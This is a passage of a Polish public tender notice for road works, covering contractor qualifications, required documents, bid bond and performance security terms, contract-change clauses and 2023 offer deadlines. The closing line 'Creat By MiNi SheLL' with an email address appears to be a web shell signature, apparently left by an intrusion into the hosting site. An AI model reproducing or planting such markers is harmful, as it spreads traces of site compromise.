000,00 zł <br/>brutto, w zakresie realizacji robót drogowych zakończonych, tj. remont, lub <br/>przebudowa, lub odbudowa, lub budowa dróg (w tym placów) o nawierzchni <br/>ulepszonej lub nieulepszonej. (Zamawiający nie wymaga wykazania realizacji <br/>robót w formule zaprojektuj i wybuduj).<br/>UWAGA<br/>1) Wykonawca nie może sumować wartości kilku robót o mniejszym zakresie <br/>dla uzyskania wymaganej wartości porównywalnej, <br/>2) Wykonawca może się powołać na doświadczenie zdobyte przy realizacji <br/>robót w ramach konsorcjum, tylko w takim zakresie, w jakim rzeczywiście <br/>roboty te sam wykonał. <br/>3) W przypadku konsorcjum przynajmniej jedna z firm musi spełnić warunek <br/>wymieniony w pkt. 2 ust a.<br/>b) dysponuje co najmniej jedną osobą, która będzie pełniła funkcję Kierownika <br/>Budowy, posiadającą uprawnienia budowlane do kierowania robotami <br/>budowlanymi w specjalności inżynieryjnej drogowej. Zamawiający uzna warunek <br/>posiadania uprawnień budowlanych poprzez przedstawienie osób posiadających <br/>uprawnienia budowlane w specjalnościach inaczej nazwanych, lecz wyłącznie <br/>takich, które uprawniają do wykonywania tych samych czynności, do których <br/>uprawniają uprawnienia budowlane do kierowania robotami budowlanymi w <br/>specjalności inżynieryjnej drogowej. Przez uprawnienia budowlane rozumie się<br/>uprawnienia do sprawowania samodzielnych funkcji technicznych w <br/>budownictwie, wydane na podstawie Prawa Budowlanego albo odpowiadające im <br/>inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących <br/>przepisów. Wskazane przez Wykonawcę osoby, bez względu na kraj ich <br/>pochodzenia i miejsce zamieszkania, muszą spełniać wymogi określone w art. <br/>12a ustawy Prawo Budowlane. Zamawiający może, na każdym etapie <br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli <br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne <br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na <br/>realizację zamówienia.<br/>2. W przypadku wspólnego ubiegania się o zamówienie na zasadach określonych <br/>w art. 58 PZP wykonawcy muszą łącznie wykazać spełnienie warunków <br/>uczestnictwa, o których mowa w pkt. 1 ppkt. 2, natomiast brak podstaw do <br/>wykluczenia, o których mowa w pkt. 1 ppkt 1, każdy z wykonawców wspólnie <br/>ubiegających się o zamówienia musi wykazać samodzielnie.<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w <br/>postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego <br/>zamówienia lub jego części, polegać na zdolnościach technicznych lub <br/>zawodowych, niezależnie od charakteru prawnego łączących go z nim <br/>stosunków prawnych. <br/>4. Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności <br/>techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania <br/>warunków udziału w postępowaniu oraz bada, czy nie zachodzą, wobec tego <br/>podmiotu podstawy wykluczenia, o których mowa w art. 108 ust. 1 oraz art. 109<br/>ust. 1 pkt. 1 i 4 ustawy PZP.<br/>5. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub <br/>doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, <br/>jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji, których te <br/>zdolności są wymagane.<br/>Do oferty wykonawca dołącza stosowne pełnomocnictwo do podpisania oferty, <br/>jeżeli uprawnienie do podpisania ofert nie wynika z dokumentów rejestrowych. W <br/>przypadku podmiotów wspólnie ubiegających się o zamówienie pełnomocnictwo <br/>do podpisania oferty lub pełnomocnictwo do podpisania oferty i zawarcia umowy <br/>w sprawie zamówienia publicznego. <br/>5. W celu potwierdzenia spełniania warunków udziału w postępowaniu <br/>Zamawiający przed udzieleniem zamówienia działając na podstawie art. 274 <br/>ust.1 wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia <br/>w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia <br/>następujących podmiotowych środków dowodowych tj.:<br/>a) wykazu robót budowlanych (załącznik nr 7) wykonanych nie wcześniej niż <br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert albo <br/>wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich <br/>rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których <br/>roboty te zostały wykonane, z załączeniem dowodów określających czy te <br/>roboty budowlane zostały wykonane należycie, w szczególności informacji o <br/>tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego <br/>i prawidłowo ukończone, przy czym dowodami, o których mowa, są <br/>poświadczenia lub referencje bądź inne dokumenty wystawione przez <br/>podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z <br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w <br/>stanie uzyskać tych dokumentów – inne dokumenty;<br/>b) wykazu osób (załącznik nr 8), skierowanych przez wykonawcę do realizacji <br/>zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie <br/>usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z <br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, <br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/>informacją o podstawie do dysponowania tymi osobami; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert <br/>oświadczenie w zakresie wskazanym w załącznikach nr 3 i 4 do SWZ. <br/>Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że <br/>wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w <br/>postępowaniu. <br/>2. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania <br/>braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w <br/>jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza <br/>informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt. 1.<br/>Wykonawca, który zamierza powierzyć wykonanie części zamówienia <br/>podwykonawcom w celu wykazania braku istnienia wobec nich podstaw <br/>wykluczenia zamieszcza informacje o tych podmiotach w oświadczeniu, o którym <br/>mowa w pkt.1. <br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców <br/>oświadczenie, o którym mowa w punkcie 1, składa każdy z wykonawców <br/>wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie <br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w <br/>którym każdy z wykonawców wykazuje spełnianie warunków udziału w <br/>postępowaniu oraz brak podstaw wykluczenia.<br/>Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej a mający <br/>miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej lub mający<br/>siedzibę poza terytorium Rzeczypospolitej Polskiej - składa dokumenty zgodnie z <br/>§ 7 Rozporządzenie Ministra Rozwoju, Pracy i Technologii 1 z dnia 23 grudnia <br/>2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów <br/>lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. 2020 <br/>poz. 2415 z późn.zm.).<br/> Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów<br/>na zasadach określonych w art. 118 ustawy PZP, musi udowodnić<br/>Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi <br/>zasobami w stopniu umożliwiającym należyte wykonanie zamówienia <br/>publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami <br/>gwarantuje rzeczywisty dostęp do ich zasobów. W tym celu wykonawca <br/>przedkłada Zamawiającemu wraz z ofertą pisemne zobowiązanie podmiotu <br/>trzeciego (wg wzoru stanowiącego załącznik nr 6 do SWZ), określające w <br/>szczególności:<br/>1) zakres dostępnych wykonawcy zasobów innego podmiotu;<br/>2) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy <br/>wykonywaniu zamówienia publicznego;<br/>3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia <br/>publicznego;<br/>4) czy inne podmioty, na zdolności, których wykonawca powołuje się w <br/>odniesieniu do warunków udziału w postępowaniu dotyczących <br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują <br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert <br/>oświadczenie w zakresie wskazanym w załącznikach nr 3 i 4 do SWZ. <br/>Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że <br/>wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w <br/>postępowaniu. <br/>2. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania <br/>braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w <br/>jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza <br/>informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt. 1. <br/>Wykonawca, który zamierza powierzyć wykonanie części zamówienia <br/>podwykonawcom w celu wykazania braku istnienia wobec nich podstaw <br/>wykluczenia zamieszcza informacje o tych podmiotach w oświadczeniu, o którym <br/>mowa w pkt.1. <br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców <br/>oświadczenie, o którym mowa w punkcie 1, składa każdy z wykonawców <br/>wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie <br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w <br/>którym każdy z wykonawców wykazuje spełnianie warunków udziału w <br/>postępowaniu oraz brak podstaw wykluczenia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości: 6.000,00 zł<br/>(sześć tysięcy 00/100 złotych).<br/>2. Wadium może być wniesione w:<br/>1) pieniądzu,<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy <br/>oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze<br/>poręczeniem pieniężnym,<br/>3) gwarancjach bankowych,<br/>4) gwarancjach ubezpieczeniowych,<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt <br/>2 ustawy z dnia 9 listopada 2000 r o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (tj. 2020 poz. 299 ze zm.). <br/>3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy <br/>zamawiającego – BNP Paribas Bank Polska S.A. nr: 24 2030 0045 1110 0000 <br/>0042 0750. Za termin wniesienia wadium przyjmuje się datę uznania rachunku <br/>zamawiającego.<br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca <br/>przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci <br/>elektronicznej.<br/>5. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób <br/>reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego <br/>(upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony <br/>w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną <br/>pieczątką lub czytelny, z podaniem imienia i nazwiska. Z treści gwarancji winno <br/>wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez <br/>zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty <br/>zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98<br/>ust. 6 ustawy PZP. <br/>6. Wadium musi zabezpieczać ofertę przez cały czas związania z ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawca przed podpisaniem umowy wniesie zabezpieczenie należytego <br/>wykonania umowy na sumę stanowiącą 5 % całkowitej zaoferowanej ceny<br/>zgodnie z SWZ.<br/>2. Kwota pozostawiona na zabezpieczenie roszczeń z tytułu rękojmi za wady <br/>będzie wynosiła 30% wysokości zabezpieczenia.<br/>3. Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w <br/>kilku następujących formach:<br/>a. pieniądzu;<br/>b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>c. gwarancjach bankowych;<br/>d. gwarancjach ubezpieczeniowych;<br/>e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 <br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości.<br/>4. Jeżeli zabezpieczenie będzie wniesione w formie innej niż pieniężna, to z <br/>dokumentów stanowiących zabezpieczenie musi jednoznacznie wynikać, że <br/>służy ono pokryciu wszelkich roszczeń z tytułu niewykonania lub nienależytego <br/>wykonania umowy, w tym ewentualnych kar umownych. Zabezpieczenie <br/>należytego wykonania umowy, we wszystkich formach przewidzianych w pkt. <br/>14.2. musi zabezpieczać roszczenia wynikające z niewykonania bądź <br/>nienależytego wykonania umowy w taki sam sposób. Zabezpieczenie wniesione <br/>w formie innej niż pieniężna nie może zabezpieczać roszczeń Zamawiającego w <br/>sposób mniej korzystny, niż jakby miało to miejsce w przypadku wniesienia <br/>zabezpieczenia w pieniądzu. Zabezpieczenie należytego wykonania umowy w <br/>formie gwarancji lub poręczenia musi być nieodwołalne, bezwarunkowe i płatne <br/>na pierwsze pisemne żądanie Zamawiającego. Zamawiający nie dopuszcza <br/>możliwości uzależnienia wypłaty kwot z gwarancji lub poręczenia od <br/>przedłożenia jakichkolwiek dodatkowych dokumentów, poświadczenia podpisu <br/>przez osoby trzecie, bądź spełnienia jakichkolwiek warunków, poza <br/>oświadczeniem Zamawiającego, iż żądana kwota jest należna z tytułu <br/>niewykonania bądź nienależytego wykonania umowy. Zamawiający musi być <br/>uprawniony w przypadku nieprzedłużenia lub niewniesienia nowego <br/>zabezpieczenia najpóźniej na 30 dni przed upływem terminu ważności <br/>dotychczasowego zabezpieczenia wniesionego w innej formie niż w pieniądzu, <br/>zmienić formę na zabezpieczenie w pieniądzu, przez wypłatę kwoty z <br/>dotychczasowego zabezpieczenia.<br/>5. W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę <br/>na zaliczenie kwoty wadium na poczet zabezpieczenia.<br/>6. Zabezpieczenie w formie pieniężnej należy wnieść przelewem na rachunek <br/>bankowy Zamawiającego wskazany w pkt. XIII.3. niniejszej SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, zgodnie z art. 455 ust. 1 pkt 1 ustawy PZP, przewiduje możliwość <br/>dokonania zmiany postanowień umowy, w następujących zakresach: <br/>1) ceny ofertowej <br/>a) w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia <br/>okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym; <br/>b) w przypadku zmiany:<br/>- stawki podatku od towarów i usług,<br/>- wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. <br/>2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za <br/>pracę,<br/>- zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu <br/>zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub <br/>zdrowotne,<br/>- zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, <br/>o których mowa w ustawie z dnia 4 października 2018 roku o pracowniczych <br/>planach kapitałowych, jeżeli w/w zmiany będą miały wpływ na koszty wykonania <br/>zamówienia przez Wykonawcę.<br/>Jeżeli zaktualizuje się którakolwiek z w/w w pkt b) podstaw do zmiany <br/>wynagrodzenia, Wykonawca zobowiązany jest przedstawić Zamawiającemu <br/>szczegółową kalkulację zmiany wysokości swojego wynagrodzenia, opartą o <br/>przesłanki wymienione w pkt b) jw. Zamawiający może żądać od Wykonawcy <br/>dodatkowych wyjaśnień w zakresie odnoszącym się do przedstawionej kalkulacji, <br/>w tym w szczególności wyjaśnień, których celem jest jednoznaczne i <br/>wyczerpujące wykazanie, w jaki sposób zmiany przepisów, o których mowa w <br/>art. 142 ust. 5 ustawy Prawo zamówień publicznych, wpłynęły na koszt <br/>wykonania zamówienia. <br/>2) terminu wykonania przedmiotu umowy: <br/>a) w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej, <br/>potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile <br/>czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu <br/>wykonania zamówienia;<br/>b) w przypadku zaistnienia okoliczności niezależnych od Wykonawcy, a w <br/>szczególności w przypadku istotnych błędów w dokumentacji projektowej, <br/>aktualizacji rozwiązań z uwagi na postęp technologiczny, zawieszenia przez <br/>Zamawiającego wykonania robót, wyjątkowo niekorzystnych warunków <br/>klimatycznych itp.;<br/>c) w przypadku wstrzymania robót przez Zamawiającego z powodu niekorzystnych <br/>warunków atmosferycznych (np. duże opady deszczu, śniegu, niskie temperatury, wysoki poziom wody gruntowej), które uniemożliwiają należyte <br/>wykonanie umowy;<br/>- w powyższych przypadkach nowy termin wykonania zamówienia ustali <br/>Zamawiający w porozumieniu z Wykonawcą uwzględniając zaistniałe okoliczności;<br/>3) sposobu realizacji zamówienia wynikającej ze zmian w obowiązujących <br/>przepisach prawa bądź wytycznych mających wpływ na realizację przedmiotu <br/>umowy;<br/>4) zmiany osób wyznaczonych przez Zamawiającego i Wykonawcę do <br/>nadzorowania i kontaktów roboczych w trakcie realizacji – osoby wyznaczone i <br/>wpisane do umowy jako osoby nadzorujące lub współpracujące w zakresie <br/>realizacji przedmiotu zamówienia mogą być zmienione zarówno przez <br/>Zamawiającego i Wykonawcę. Jeśli osoby te winny spełniać określone <br/>wymagania to strony to potwierdzą w sposób przewidziany w SWZ. Jeżeli osoby <br/>te nie muszą spełniać określonych wymagań to ich zmiana może nastąpić po <br/>uprzednim pisemnym, skutecznym zawiadomieniu strony przeciwnej. Powyższa <br/>zmiana będzie wymagała pisemnego poinformowania i zgody Zamawiającego.<br/>5) Zamawiający dopuszcza zmianę Podwykonawców - podmiotów trzecich, na <br/>zasobach, których Wykonawca opierał się wykazując spełnianie warunków <br/>udziału w postępowaniu pod warunkiem, że kolejny Podwykonawca lub sam <br/>Wykonawca wykaże spełnianie warunków,<br/>6) gdy Wykonawcą jest konsorcjum firm, Zamawiający dopuszcza zmianę podmiotu <br/>wchodzącego w skład konsorcjum, pod warunkiem, że nowy podmiot <br/>przystępujący do konsorcjum lub podmioty pozostałe po ustąpieniu jednego z <br/>konsorcjantów, spełniają warunki udziału w postępowaniu i nie zachodzą w <br/>stosunku do nich podstawy do wykluczenia, oraz gdy zmiana taka nie pociąga za <br/>sobą innych istotnych zmian umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.josephine.proebiz.com</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-11 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com